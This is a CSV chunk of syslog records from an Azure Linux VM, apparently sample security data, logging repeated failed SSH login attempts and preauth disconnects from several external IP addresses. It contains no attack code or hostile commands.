+6562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:17,UbuntuDevEnv,2019-06-26 17:00:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:17,UbuntuDevEnv,2019-06-26 17:00:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:19,UbuntuDevEnv,2019-06-26 17:00:19,auth,UbuntuDevEnv,info,Failed password for invalid user b from 35.154.19.93 port 36302 ssh2,43541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,b,35.154.19.9,36302,,
+6565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:19,UbuntuDevEnv,2019-06-26 17:00:19,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 36302:11: Normal Shutdown, Thank you for playing [preauth]",43541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,36302,,
+6566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:19,UbuntuDevEnv,2019-06-26 17:00:19,auth,UbuntuDevEnv,info,Disconnected from invalid user b 35.154.19.93 port 36302 [preauth],43541,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,b,35.154.19.9,36302,,
+6567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:24,UbuntuDevEnv,2019-06-26 17:00:24,auth,UbuntuDevEnv,info,Invalid user c from 35.154.19.93 port 39576,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,c,35.154.19.9,39576,,
+6568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:24,UbuntuDevEnv,2019-06-26 17:00:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:24,UbuntuDevEnv,2019-06-26 17:00:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:26,UbuntuDevEnv,2019-06-26 17:00:25,auth,UbuntuDevEnv,info,Failed password for invalid user c from 35.154.19.93 port 39576 ssh2,43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,c,35.154.19.9,39576,,
+6571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:26,UbuntuDevEnv,2019-06-26 17:00:26,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 39576:11: Normal Shutdown, Thank you for playing [preauth]",43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,39576,,
+6572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:26,UbuntuDevEnv,2019-06-26 17:00:26,auth,UbuntuDevEnv,info,Disconnected from invalid user c 35.154.19.93 port 39576 [preauth],43569,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,c,35.154.19.9,39576,,
+6573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:31,UbuntuDevEnv,2019-06-26 17:00:31,auth,UbuntuDevEnv,info,Invalid user adm from 35.154.19.93 port 42852,43653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,35.154.19.9,42852,,
+6574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:31,UbuntuDevEnv,2019-06-26 17:00:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:31,UbuntuDevEnv,2019-06-26 17:00:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:33,UbuntuDevEnv,2019-06-26 17:00:33,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 35.154.19.93 port 42852 ssh2,43653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,35.154.19.9,42852,,
+6577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:33,UbuntuDevEnv,2019-06-26 17:00:33,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 42852:11: Normal Shutdown, Thank you for playing [preauth]",43653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,42852,,
+6578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:33,UbuntuDevEnv,2019-06-26 17:00:33,auth,UbuntuDevEnv,info,Disconnected from invalid user adm 35.154.19.93 port 42852 [preauth],43653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,35.154.19.9,42852,,
+6579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:37,UbuntuDevEnv,2019-06-26 17:00:36,auth,UbuntuDevEnv,info,Invalid user shane from 74.94.246.82 port 46478,43674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shane,74.94.246.8,46478,,
+6580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:37,UbuntuDevEnv,2019-06-26 17:00:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,43674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:37,UbuntuDevEnv,2019-06-26 17:00:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:38,UbuntuDevEnv,2019-06-26 17:00:37,auth,UbuntuDevEnv,info,Invalid user adm from 35.154.19.93 port 46108,43679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,35.154.19.9,46108,,
+6583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:38,UbuntuDevEnv,2019-06-26 17:00:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:38,UbuntuDevEnv,2019-06-26 17:00:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:38,UbuntuDevEnv,2019-06-26 17:00:38,auth,UbuntuDevEnv,info,Failed password for invalid user shane from 74.94.246.82 port 46478 ssh2,43674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shane,74.94.246.8,46478,,
+6586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:38,UbuntuDevEnv,2019-06-26 17:00:38,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 46478:11: Bye Bye [preauth],43674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,46478,,
+6587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:38,UbuntuDevEnv,2019-06-26 17:00:38,auth,UbuntuDevEnv,info,Disconnected from invalid user shane 74.94.246.82 port 46478 [preauth],43674,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shane,74.94.246.8,46478,,
+6588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:40,UbuntuDevEnv,2019-06-26 17:00:40,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 35.154.19.93 port 46108 ssh2,43679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,35.154.19.9,46108,,
+6589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:40,UbuntuDevEnv,2019-06-26 17:00:40,auth,UbuntuDevEnv,info,Disconnected from invalid user adm 35.154.19.93 port 46108 [preauth],43679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,35.154.19.9,46108,,
+6590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:40,UbuntuDevEnv,2019-06-26 17:00:40,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 46108:11: Normal Shutdown, Thank you for playing [preauth]",43679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,46108,,
+6591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:47,UbuntuDevEnv,2019-06-26 17:00:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=backup,43713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,35.154.19.9,,0,
+6592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:49,UbuntuDevEnv,2019-06-26 17:00:49,auth,UbuntuDevEnv,info,Failed password for backup from 35.154.19.93 port 49386 ssh2,43713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,49386,,
+6593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:49,UbuntuDevEnv,2019-06-26 17:00:49,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 49386:11: Normal Shutdown, Thank you for playing [preauth]",43713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,49386,,
+6594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:49,UbuntuDevEnv,2019-06-26 17:00:49,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 35.154.19.93 port 49386 [preauth],43713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,35.154.19.9,49386,,
+6595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:54,UbuntuDevEnv,2019-06-26 17:00:53,auth,UbuntuDevEnv,info,Invalid user miner from 77.237.69.165 port 58155,43744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,77.237.69.1,58155,,
+6596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:54,UbuntuDevEnv,2019-06-26 17:00:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,43744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:54,UbuntuDevEnv,2019-06-26 17:00:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:56,UbuntuDevEnv,2019-06-26 17:00:55,auth,UbuntuDevEnv,info,Failed password for invalid user miner from 77.237.69.165 port 58155 ssh2,43744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,77.237.69.1,58155,,
+6599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:56,UbuntuDevEnv,2019-06-26 17:00:55,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 58155:11: Bye Bye [preauth],43744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,58155,,
+6600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:00:56,UbuntuDevEnv,2019-06-26 17:00:55,auth,UbuntuDevEnv,info,Disconnected from invalid user miner 77.237.69.165 port 58155 [preauth],43744,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miner,77.237.69.1,58155,,
+6601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:05,UbuntuDevEnv,2019-06-26 17:01:05,auth,UbuntuDevEnv,info,Invalid user peiqian from 81.0.212.18 port 39469,43782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peiqian,81.0.212.1,39469,,
+6602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:05,UbuntuDevEnv,2019-06-26 17:01:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,43782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:05,UbuntuDevEnv,2019-06-26 17:01:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:07,UbuntuDevEnv,2019-06-26 17:01:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=backup,43785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,backup,35.154.19.9,,0,
+6605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:07,UbuntuDevEnv,2019-06-26 17:01:07,auth,UbuntuDevEnv,info,Failed password for invalid user peiqian from 81.0.212.18 port 39469 ssh2,43782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peiqian,81.0.212.1,39469,,
+6606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:07,UbuntuDevEnv,2019-06-26 17:01:07,auth,UbuntuDevEnv,info,Disconnected from invalid user peiqian 81.0.212.18 port 39469 [preauth],43782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peiqian,81.0.212.1,39469,,
+6607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:07,UbuntuDevEnv,2019-06-26 17:01:07,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 39469:11: Bye Bye [preauth],43782,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,39469,,
+6608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:08,UbuntuDevEnv,2019-06-26 17:01:08,auth,UbuntuDevEnv,info,Failed password for backup from 35.154.19.93 port 52630 ssh2,43785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,52630,,
+6609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:09,UbuntuDevEnv,2019-06-26 17:01:08,auth,UbuntuDevEnv,info,Disconnected from authenticating user backup 35.154.19.93 port 52630 [preauth],43785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,backup,35.154.19.9,52630,,
+6610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:09,UbuntuDevEnv,2019-06-26 17:01:08,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 52630:11: Normal Shutdown, Thank you for playing [preauth]",43785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,52630,,
+6611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:14,UbuntuDevEnv,2019-06-26 17:01:14,auth,UbuntuDevEnv,info,Invalid user augustin from 171.8.199.77 port 47606,43816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,augustin,171.8.199.7,47606,,
+6612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:14,UbuntuDevEnv,2019-06-26 17:01:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,43816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:14,UbuntuDevEnv,2019-06-26 17:01:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:17,UbuntuDevEnv,2019-06-26 17:01:16,auth,UbuntuDevEnv,info,Failed password for invalid user augustin from 171.8.199.77 port 47606 ssh2,43816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,augustin,171.8.199.7,47606,,
+6615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:17,UbuntuDevEnv,2019-06-26 17:01:16,auth,UbuntuDevEnv,info,Disconnected from invalid user augustin 171.8.199.77 port 47606 [preauth],43816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,augustin,171.8.199.7,47606,,
+6616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:17,UbuntuDevEnv,2019-06-26 17:01:16,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 47606:11: Bye Bye [preauth],43816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,47606,,
+6617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:29,UbuntuDevEnv,2019-06-26 17:01:28,auth,UbuntuDevEnv,info,Invalid user html from 35.154.19.93 port 55944,43874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,35.154.19.9,55944,,
+6618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:29,UbuntuDevEnv,2019-06-26 17:01:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,43874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:29,UbuntuDevEnv,2019-06-26 17:01:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:31,UbuntuDevEnv,2019-06-26 17:01:31,auth,UbuntuDevEnv,info,Failed password for invalid user html from 35.154.19.93 port 55944 ssh2,43874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,35.154.19.9,55944,,
+6621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:01:31,UbuntuDevEnv,2019-06-26 17:01:31,auth,UbuntuDevEnv,info,Disconnected from invalid user html 35.154.19.93 port 55944 [preauth],43874,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,html,35.154.19.9,55944,,
